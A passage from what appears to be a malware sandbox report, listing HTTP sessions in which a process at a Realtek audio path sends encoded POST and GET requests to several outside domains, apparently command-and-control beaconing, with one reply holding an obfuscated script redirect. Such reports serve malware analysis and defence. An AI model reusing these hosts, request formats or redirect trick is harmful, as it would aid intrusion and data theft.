                                                                                Nov 25, 2024 11:59:07.240436077 CET5303OUTData Raw: 4e 5a 59 39 76 73 2b 43 4a 32 32 50 38 33 63 48 57 48 50 77 73 7a 75 4a 2f 44 56 79 6a 43 55 30 6e 70 37 73 5a 71 66 35 6c 5a 4d 51 73 66 71 51 34 6b 4b 51 48 50 35 41 57 58 4a 54 32 32 2b 41 73 51 74 75 2b 42 4e 4f 36 62 30 51 4f 6b 7a 37 51 46
                                                                                Data Ascii: NZY9vs+CJ22P83cHWHPwszuJ/DVyjCU0np7sZqf5lZMQsfqQ4kKQHP5AWXJT22+AsQtu+BNO6b0QOkz7QFJkAVwFoW6Z7JPKWqZHCBSIYa3tLS4G62UfxpMo2xGAhDbnpcNsHsE+TNd9ZYtwz4ga1O9x5qR6kyfRThwG81InTM4Vxnz67R41eiYZS1hSL6E/QrgoUdK5IevL/z07U1gEA22uhc7tlMIzacm/NR3y3gccmazTD1G
                                                                                Nov 25, 2024 11:59:07.558897018 CET364INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 10:59:07 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 96 19 7e 21 5e 19 3e b9 7e 79 be 21 81 55 49 99 a6 e5 c9 b9 16 66 7e 59 91 26 fe 81 b6 b6 ea 9a 36 fa 50 13 01 2b 3f d7 f6 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 67)N.,(ON,VPV/Ji%IAf>~!^>~y!UIf~Y&6P+?Z0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                25192.168.11.2049766154.88.22.105807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:59:10.061517954 CET452OUTGET /sp9i/?2WLcH=/yY+7m1AZbgb0K2/LwtBLxCjXaU0b9j5Pi53FyGdgcs4UrSukFrrBxiVM6k9vqLarsWUeALRJhCd8Ws3EraXiGfQePxT8U++C5GowWJeifl9yaVeP5ongLY=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.cg19g5.pro
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 11:59:10.374891996 CET332INHTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 10:59:10 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                Data Raw: 35 37 0d 0a 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 5b 27 68 27 2b 27 72 65 27 2b 27 66 27 5d 20 3d 20 61 74 6f 62 28 27 61 48 52 30 63 48 4d 36 4c 79 39 68 4e 54 4a 68 4c 6d 4e 6e 4d 54 51 7a 62 69 35 77 63 6d 38 36 4e 6a 59 34 4f 51 3d 3d 27 29 3c 2f 73 63 72 69 0d 0a 33 0d 0a 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 57<script>location['h'+'re'+'f'] = atob('aHR0cHM6Ly9hNTJhLmNnMTQzbi5wcm86NjY4OQ==')</scri3pt>0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                26192.168.11.204976743.155.76.124807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:59:16.144438982 CET718OUTPOST /gzx8/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.nuy25c9t.sbs
                                                                                Origin: http://www.nuy25c9t.sbs
                                                                                Referer: http://www.nuy25c9t.sbs/gzx8/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 2b 59 4d 45 33 73 2b 62 5a 49 43 4e 54 37 57 2b 33 66 34 2b 78 41 61 58 4c 62 4d 65 55 75 54 67 57 43 6d 56 61 36 5a 42 41 46 4c 71 49 38 79 53 5a 33 35 4a 54 6a 55 52 59 51 47 34 6f 33 56 31 47 6f 50 4f 67 7a 58 61 49 53 49 77 4f 33 41 63 39 53 71 64 36 36 62 57 47 51 43 43 30 36 33 66 2f 76 6f 32 33 41 4f 30 45 66 4a 76 76 44 68 74 79 4f 6d 62 44 5a 37 64 7a 70 75 59 70 2b 45 4e 78 46 41 2b 46 45 6f 2f 77 77 4a 32 50 6b 31 56 37 53 74 35 34 72 2f 33 6a 47 35 44 49 48 74 41 6b 74 32 4c 69 66 38 33 2b 43 4d 36 72 4e 70 5a 66 4f 7a 74 2b 66 50 59 46 6a 47 72 30 62 61 4e 7a 41 3d 3d
                                                                                Data Ascii: 2WLcH=+YME3s+bZICNT7W+3f4+xAaXLbMeUuTgWCmVa6ZBAFLqI8ySZ35JTjURYQG4o3V1GoPOgzXaISIwO3Ac9Sqd66bWGQCC063f/vo23AO0EfJvvDhtyOmbDZ7dzpuYp+ENxFA+FEo/wwJ2Pk1V7St54r/3jG5DIHtAkt2Lif83+CM6rNpZfOzt+fPYFjGr0baNzA==
                                                                                Nov 25, 2024 11:59:16.465785027 CET306INHTTP/1.1 404 Not Found
                                                                                Server: Tengine
                                                                                Date: Mon, 25 Nov 2024 10:59:16 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Content-Length: 146
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                27192.168.11.204976843.155.76.124807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:59:18.981373072 CET738OUTPOST /gzx8/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.nuy25c9t.sbs
                                                                                Origin: http://www.nuy25c9t.sbs
                                                                                Referer: http://www.nuy25c9t.sbs/gzx8/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 2b 59 4d 45 33 73 2b 62 5a 49 43 4e 56 6f 65 2b 37 65 34 2b 32 67 61 55 48 37 4d 65 64 4f 53 70 57 43 36 56 61 34 30 4b 41 32 76 71 4a 65 61 53 59 32 35 4a 51 6a 55 52 41 41 47 35 6d 58 56 45 47 70 7a 47 67 7a 62 61 49 57 6f 77 4f 79 38 63 39 68 79 65 67 4b 62 55 4e 77 43 41 70 4b 33 66 2f 76 6f 32 33 41 61 65 45 66 42 76 75 7a 52 74 67 37 53 63 4a 35 37 65 35 4a 75 59 2b 75 45 52 78 46 41 63 46 47 52 51 77 30 35 32 50 6b 46 56 37 44 74 36 7a 72 2f 78 75 6d 34 4f 48 48 42 4b 6b 76 36 76 72 39 34 37 38 68 4d 62 6a 37 6b 44 43 38 48 4a 39 4d 54 71 42 54 2f 44 32 5a 62 57 75 48 55 41 39 65 67 32 76 6b 33 4e 4a 34 58 64 4a 58 51 5a 32 65 55 3d
                                                                                Data Ascii: 2WLcH=+YME3s+bZICNVoe+7e4+2gaUH7MedOSpWC6Va40KA2vqJeaSY25JQjURAAG5mXVEGpzGgzbaIWowOy8c9hyegKbUNwCApK3f/vo23AaeEfBvuzRtg7ScJ57e5JuY+uERxFAcFGRQw052PkFV7Dt6zr/xum4OHHBKkv6vr9478hMbj7kDC8HJ9MTqBT/D2ZbWuHUA9eg2vk3NJ4XdJXQZ2eU=
                                                                                Nov 25, 2024 11:59:19.295945883 CET306INHTTP/1.1 404 Not Found
                                                                                Server: Tengine
                                                                                Date: Mon, 25 Nov 2024 10:59:19 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Content-Length: 146
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                28192.168.11.204976943.155.76.124807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:59:21.829489946 CET2578OUTPOST /gzx8/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.nuy25c9t.sbs
                                                                                Origin: http://www.nuy25c9t.sbs
                                                                                Referer: http://www.nuy25c9t.sbs/gzx8/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 2b 59 4d 45 33 73 2b 62 5a 49 43 4e 56 6f 65 2b 37 65 34 2b 32 67 61 55 48 37 4d 65 64 4f 53 70 57 43 36 56 61 34 30 4b 41 32 6e 71 4a 76 36 53 61 56 52 4a 52 6a 55 52 65 51 47 38 6d 58 56 5a 47 70 72 43 67 79 6e 6b 49 55 51 77 63 41 45 63 37 55 47 65 31 61 62 55 43 51 43 42 30 36 33 77 2f 76 59 79 33 41 4b 65 45 66 42 76 75 31 39 74 69 75 6d 63 50 35 37 64 7a 70 75 55 70 2b 45 74 78 46 59 6d 46 47 56 36 77 6e 78 32 4f 41 68 56 34 77 46 36 76 37 2f 7a 72 6d 35 64 48 48 4d 51 6b 73 4f 6a 72 39 38 43 38 69 73 62 68 2f 4e 45 56 63 33 6c 6a 64 76 35 45 51 50 30 32 76 79 47 6c 46 59 2b 32 4e 49 41 73 54 44 46 48 72 62 54 4e 56 64 53 73 59 72 79 4c 4c 73 43 61 38 73 56 46 56 5a 74 2b 69 67 30 4c 77 47 30 56 72 62 32 58 75 44 69 46 48 53 32 2f 36 54 6f 76 6d 52 55 66 6b 2f 55 4a 6c 76 7a 68 31 37 77 45 34 33 68 68 36 52 37 42 36 42 32 71 70 69 35 31 64 46 56 4e 49 35 49 56 56 5a 6a 59 4b 6b 68 67 69 51 50 49 53 33 2b 67 61 53 5a 36 7a 38 71 38 54 75 2f 32 53 78 35 61 44 69 5a 76 4e 70 53 [TRUNCATED]
                                                                                Data Ascii: 2WLcH=+YME3s+bZICNVoe+7e4+2gaUH7MedOSpWC6Va40KA2nqJv6SaVRJRjUReQG8mXVZGprCgynkIUQwcAEc7UGe1abUCQCB063w/vYy3AKeEfBvu19tiumcP57dzpuUp+EtxFYmFGV6wnx2OAhV4wF6v7/zrm5dHHMQksOjr98C8isbh/NEVc3ljdv5EQP02vyGlFY+2NIAsTDFHrbTNVdSsYryLLsCa8sVFVZt+ig0LwG0Vrb2XuDiFHS2/6TovmRUfk/UJlvzh17wE43hh6R7B6B2qpi51dFVNI5IVVZjYKkhgiQPIS3+gaSZ6z8q8Tu/2Sx5aDiZvNpSCZ5D90qMBpRermazRKYd0B+T7amTaBJvYINJtfMu+0bc+Wd80cfv6cijkQZQvhEzidAPOwn1L0E+bXR+7CSOWAsHJOAg0X5YzGvsWT/x5kerF7+k0tfOQNUZISXzzVUBzBvuNNBvUSJmoHBZb7XLfLDmKMHlBs0QySJx1Dz1fJgqhERmAvo2h7GZDcaaZPyTgNT99iIW7/IlMsA3FcSZupLV1WU5fX/nnfK7EmvgdqhIUbGc99Br+KGGrDMRgMblHzQ2GSGirWpjzrHkBl1JvCJmNTY6GNseW907ps+wzBCwRVZ/wdzCkzkLfhhDR1+KKtrS1cgMXm4JjLYSsrKZ4p0eALZityWAFx6kgsdLSCMGEVyy6ctxON1EKsTqN7Jl5KYx5kiDRLbdN4qKoZyRdkR9/A41/4VhXA/I5zdUTtWIUUoqBeVZy//SKbh255q8yh+CY+it8EzstZbGdSvzibq3xncnIav6s3px1/NDeKPP2QyQuy/r5ZMO2FON9wxJUu47MEl+pe1v3toYk14bMkYhtCKMQvSMXK6O8hDMGmurUEASI+uD6XN2L58qzG6U2kG+w9Qw1mH+PihCmhYlkElT0ivFyMyYM/qTD6rAybhRNaP9d9duzEX+XRy5uAm2FuBqgqa8VgsoIpXj3L792hd578TokibVFL [TRUNCATED]
                                                                                Nov 25, 2024 11:59:21.829579115 CET5156OUTData Raw: 43 47 6c 39 76 54 64 6f 47 79 66 70 77 42 45 4e 2f 59 72 75 69 54 56 70 66 55 30 68 41 37 68 56 74 59 31 42 6e 76 44 50 70 7a 4f 6d 4e 76 58 7a 4d 51 67 70 2f 6b 48 70 46 4c 52 50 55 35 55 57 42 5a 68 79 55 78 7a 76 4e 30 43 4e 4e 36 35 6b 74 76
                                                                                Data Ascii: CGl9vTdoGyfpwBEN/YruiTVpfU0hA7hVtY1BnvDPpzOmNvXzMQgp/kHpFLRPU5UWBZhyUxzvN0CNN65ktv1RZGZkNErCF94GfrCuZaUZ7DEhCEg88f5EdTaosHYXIDi9mBTDhu/s0F9W8c+RZjFnjAPKcuJ+gW2uaqMAC9DFN0xg9OolhBZB33fdTv7j8gL7ax6hGE0cIS3FL1j/2yMugQL8Xvxl3xZQBD1d94l2qOXiHSnxPRt
                                                                                Nov 25, 2024 11:59:21.829592943 CET153OUTData Raw: 7a 33 55 69 67 4b 38 56 77 41 4a 42 52 36 66 37 4c 73 44 4a 31 75 68 64 2f 2b 2f 4d 73 47 6a 6e 33 30 37 62 52 55 74 77 2b 64 4d 71 42 31 78 53 54 4f 33 56 39 66 2b 52 54 56 55 75 65 36 7a 73 6a 36 33 6d 2f 64 48 55 47 74 70 75 6e 51 2f 68 41 4d
                                                                                Data Ascii: z3UigK8VwAJBR6f7LsDJ1uhd/+/MsGjn307bRUtw+dMqB1xSTO3V9f+RTVUue6zsj63m/dHUGtpunQ/hAM3VCOg56dn9uVbw4UVZKIXqLkSec8Us9jrYfa3QbVbDZLtnbzRu5q+YN2cNee1AyYpNNLA==
                                                                                Nov 25, 2024 11:59:22.149450064 CET306INHTTP/1.1 404 Not Found
                                                                                Server: Tengine
                                                                                Date: Mon, 25 Nov 2024 10:59:21 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Content-Length: 146
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                29192.168.11.204977043.155.76.124807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:59:24.667762995 CET454OUTGET /gzx8/?2WLcH=zakk0Z6QX+PeMKuO9doP3TuSH4tsROWjUg+AcMIBC3jNAdeJcFpvchgVbxSCnVd2G7blpBbqDXciYyMV8Uav3uCQEiSaobLJsegQ2xqoFvZbzlxviNb8bJg=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.nuy25c9t.sbs
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 11:59:24.984286070 CET306INHTTP/1.1 404 Not Found
                                                                                Server: Tengine
                                                                                Date: Mon, 25 Nov 2024 10:59:24 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Content-Length: 146
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                30192.168.11.204977166.29.149.46807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:59:30.267843008 CET724OUTPOST /rb2m/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.golivenow.live
                                                                                Origin: http://www.golivenow.live
                                                                                Referer: http://www.golivenow.live/rb2m/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 4f 75 62 46 70 57 65 4c 39 61 65 65 31 49 4d 43 51 52 59 46 66 4e 36 34 39 4c 49 6f 2f 69 2f 67 6b 66 58 63 6d 43 4e 4d 44 4b 36 33 41 30 4f 2f 6c 61 67 6f 35 6b 32 57 33 33 53 61 62 57 78 31 30 4d 2f 77 78 4c 65 33 4f 52 49 4e 6c 6d 77 47 69 59 65 6d 4c 39 38 32 31 45 37 54 32 39 4e 51 52 4e 53 69 74 58 68 2b 69 44 4c 42 35 6a 67 6d 31 37 58 2b 37 33 72 73 66 47 4e 45 59 42 7a 76 46 47 56 48 48 65 35 74 56 31 50 6d 4c 52 4c 34 32 64 61 55 51 76 49 70 35 36 58 35 30 51 51 59 47 6b 75 51 34 39 63 78 70 47 73 46 56 41 51 32 6e 44 76 79 57 74 35 7a 6e 4d 45 43 39 79 72 2f 41 67 3d 3d
                                                                                Data Ascii: 2WLcH=OubFpWeL9aee1IMCQRYFfN649LIo/i/gkfXcmCNMDK63A0O/lago5k2W33SabWx10M/wxLe3ORINlmwGiYemL9821E7T29NQRNSitXh+iDLB5jgm17X+73rsfGNEYBzvFGVHHe5tV1PmLRL42daUQvIp56X50QQYGkuQ49cxpGsFVAQ2nDvyWt5znMEC9yr/Ag==
                                                                                Nov 25, 2024 11:59:30.448292017 CET637INHTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 10:59:30 GMT
                                                                                Server: Apache
                                                                                Content-Length: 493
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                31192.168.11.204977266.29.149.46807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 11:59:32.952253103 CET744OUTPOST /rb2m/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.golivenow.live
                                                                                Origin: http://www.golivenow.live
                                                                                Referer: http://www.golivenow.live/rb2m/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 4f 75 62 46 70 57 65 4c 39 61 65 65 33 6f 38 43 58 47 6b 46 58 4e 36 2f 32 72 49 6f 6d 53 2f 6b 6b 66 4c 63 6d 48 74 6d 44 34 75 33 41 51 43 2f 6b 62 67 6f 2b 6b 32 57 35 58 53 44 44 32 78 75 30 4d 69 44 78 4f 2b 33 4f 52 73 4e 6c 6d 67 47 6c 72 32 6c 45 4e 38 30 2b 6b 37 52 79 39 4e 51 52 4e 53 69 74 58 6c 55 69 44 44 42 34 54 77 6d 31 66 6a 78 31 58 72 72 59 47 4e 45 63 42 7a 72 46 47 56 70 48 66 6b 6c 56 33 33 6d 4c 55 33 34 33 49 75 58 65 66 49 72 33 61 58 75 6b 42 42 75 49 58 6d 65 78 4e 41 68 6d 54 38 4c 51 57 64 73 36 78 62 57 56 2b 6c 42 6a 38 39 71 2f 77 71 6b 64 72 50 78 47 43 64 51 66 61 6b 4c 37 65 36 37 4d 42 63 65 2f 67 6f 3d
                                                                                Data Ascii: 2WLcH=OubFpWeL9aee3o8CXGkFXN6/2rIomS/kkfLcmHtmD4u3AQC/kbgo+k2W5XSDD2xu0MiDxO+3ORsNlmgGlr2lEN80+k7Ry9NQRNSitXlUiDDB4Twm1fjx1XrrYGNEcBzrFGVpHfklV33mLU343IuXefIr3aXukBBuIXmexNAhmT8LQWds6xbWV+lBj89q/wqkdrPxGCdQfakL7e67MBce/go=
                                                                                Nov 25, 2024 11:59:33.126393080 CET637INHTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 10:59:33 GMT
                                                                                Server: Apache
                                                                                Content-Length: 493
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
